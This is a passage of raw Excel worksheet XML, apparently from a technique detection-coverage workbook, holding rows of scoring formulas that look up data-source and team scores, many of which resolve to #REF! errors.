        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F106&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F106))-LEN(SUBSTITUTE(TRIM(F106),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K106" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L106" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F106&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F106))-LEN(SUBSTITUTE(TRIM(F106),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M106" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N106" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F106&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F106))-LEN(SUBSTITUTE(TRIM(F106),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O106" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P106" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F106&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F106))-LEN(SUBSTITUTE(TRIM(F106),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q106" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R106" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F106&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F106))-LEN(SUBSTITUTE(TRIM(F106),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S106" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T106" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F106&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F106))-LEN(SUBSTITUTE(TRIM(F106),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U106" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V106" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F106&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F106))-LEN(SUBSTITUTE(TRIM(F106),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W106" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X106" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F106&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F106))-LEN(SUBSTITUTE(TRIM(F106),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y106" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="107" spans="1:25" ht="156.75" x14ac:dyDescent="0.45">
      <c r="A107" s="8" t="s">
        <v>44</v>
      </c>
      <c r="B107" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C107" s="8" t="s">
        <v>702</v>
      </c>
      <c r="D107" s="10" t="s">
        <v>703</v>
      </c>
      <c r="E107" s="10" t="s">
        <v>704</v>
      </c>
      <c r="F107" s="10" t="s">
        <v>705</v>
      </c>
      <c r="G107" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K107,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H107" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F107&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F107))-LEN(SUBSTITUTE(TRIM(F107),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I107" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F107&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F107))-LEN(SUBSTITUTE(TRIM(F107),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J107" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F107&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F107))-LEN(SUBSTITUTE(TRIM(F107),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K107" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L107" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F107&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F107))-LEN(SUBSTITUTE(TRIM(F107),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M107" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N107" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F107&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F107))-LEN(SUBSTITUTE(TRIM(F107),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O107" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P107" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F107&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F107))-LEN(SUBSTITUTE(TRIM(F107),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q107" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R107" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F107&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F107))-LEN(SUBSTITUTE(TRIM(F107),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S107" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T107" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F107&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F107))-LEN(SUBSTITUTE(TRIM(F107),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U107" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V107" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F107&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F107))-LEN(SUBSTITUTE(TRIM(F107),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W107" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X107" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F107&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F107))-LEN(SUBSTITUTE(TRIM(F107),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y107" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="108" spans="1:25" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A108" s="8" t="s">
        <v>128</v>
      </c>
      <c r="B108" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C108" s="8" t="s">
        <v>706</v>
      </c>
      <c r="D108" s="10" t="s">
        <v>707</v>
      </c>
      <c r="E108" s="10" t="s">
        <v>708</v>
      </c>
      <c r="F108" s="10" t="s">
        <v>709</v>
      </c>
      <c r="G108" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K108,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H108" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F108&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F108))-LEN(SUBSTITUTE(TRIM(F108),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I108" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F108&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F108))-LEN(SUBSTITUTE(TRIM(F108),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J108" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F108&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F108))-LEN(SUBSTITUTE(TRIM(F108),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K108" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L108" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F108&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F108))-LEN(SUBSTITUTE(TRIM(F108),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M108" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N108" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F108&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F108))-LEN(SUBSTITUTE(TRIM(F108),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O108" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P108" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F108&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F108))-LEN(SUBSTITUTE(TRIM(F108),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q108" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R108" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F108&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F108))-LEN(SUBSTITUTE(TRIM(F108),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S108" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T108" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F108&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F108))-LEN(SUBSTITUTE(TRIM(F108),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U108" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V108" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F108&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F108))-LEN(SUBSTITUTE(TRIM(F108),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W108" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X108" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F108&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F108))-LEN(SUBSTITUTE(TRIM(F108),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y108" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="109" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A109" s="8" t="s">
        <v>203</v>
      </c>
      <c r="B109" s="8" t="s">
        <v>710</v>
      </c>
      <c r="C109" s="8" t="s">
        <v>711</v>
      </c>
      <c r="D109" s="10" t="s">
        <v>712</v>
      </c>
      <c r="E109" s="10" t="s">
        <v>713</v>
      </c>
      <c r="F109" s="10" t="s">
        <v>714</v>
      </c>
      <c r="G109" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K109,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H109" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F109&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F109))-LEN(SUBSTITUTE(TRIM(F109),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I109" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F109&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F109))-LEN(SUBSTITUTE(TRIM(F109),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J109" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F109&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F109))-LEN(SUBSTITUTE(TRIM(F109),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K109" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L109" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F109&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F109))-LEN(SUBSTITUTE(TRIM(F109),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M109" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N109" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F109&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F109))-LEN(SUBSTITUTE(TRIM(F109),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O109" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P109" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F109&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F109))-LEN(SUBSTITUTE(TRIM(F109),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q109" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R109" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F109&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F109))-LEN(SUBSTITUTE(TRIM(F109),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S109" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T109" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F109&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F109))-LEN(SUBSTITUTE(TRIM(F109),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U109" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V109" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F109&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F109))-LEN(SUBSTITUTE(TRIM(F109),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W109" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X109" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F109&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F109))-LEN(SUBSTITUTE(TRIM(F109),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y109" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="110" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A110" s="8" t="s">
        <v>61</v>
      </c>
      <c r="B110" s="8" t="s">
        <v>710</v>
      </c>
      <c r="C110" s="8" t="s">
        <v>715</v>
      </c>
      <c r="D110" s="10" t="s">
        <v>716</v>
      </c>
      <c r="E110" s="10"/>
      <c r="F110" s="10" t="s">
        <v>717</v>
      </c>
      <c r="G110" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K110,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H110" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F110&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F110))-LEN(SUBSTITUTE(TRIM(F110),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I110" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F110&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F110))-LEN(SUBSTITUTE(TRIM(F110),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J110" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F110&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F110))-LEN(SUBSTITUTE(TRIM(F110),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K110" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L110" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F110&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F110))-LEN(SUBSTITUTE(TRIM(F110),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M110" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N110" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F110&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F110))-LEN(SUBSTITUTE(TRIM(F110),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O110" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P110" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F110&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F110))-LEN(SUBSTITUTE(TRIM(F110),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q110" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R110" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F110&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F110))-LEN(SUBSTITUTE(TRIM(F110),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S110" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T110" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F110&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F110))-LEN(SUBSTITUTE(TRIM(F110),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U110" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V110" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F110&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F110))-LEN(SUBSTITUTE(TRIM(F110),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W110" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X110" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F110&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F110))-LEN(SUBSTITUTE(TRIM(F110),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y110" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="111" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A111" s="8" t="s">
        <v>32</v>
      </c>
      <c r="B111" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C111" s="8" t="s">
        <v>718</v>
      </c>
      <c r="D111" s="10" t="s">
        <v>719</v>
      </c>
      <c r="E111" s="10" t="s">
        <v>720</v>
      </c>
      <c r="F111" s="10" t="s">
        <v>377</v>
      </c>
      <c r="G111" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K111,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H111" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F111&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F111))-LEN(SUBSTITUTE(TRIM(F111),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I111" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F111&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F111))-LEN(SUBSTITUTE(TRIM(F111),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J111" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F111&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F111))-LEN(SUBSTITUTE(TRIM(F111),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K111" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L111" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F111&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F111))-LEN(SUBSTITUTE(TRIM(F111),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M111" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N111" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F111&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F111))-LEN(SUBSTITUTE(TRIM(F111),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O111" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P111" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F111&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F111))-LEN(SUBSTITUTE(TRIM(F111),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q111" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R111" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F111&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F111))-LEN(SUBSTITUTE(TRIM(F111),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S111" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T111" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F111&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F111))-LEN(SUBSTITUTE(TRIM(F111),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U111" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V111" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F111&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F111))-LEN(SUBSTITUTE(TRIM(F111),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W111" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X111" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F111&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F111))-LEN(SUBSTITUTE(TRIM(F111),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y111" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
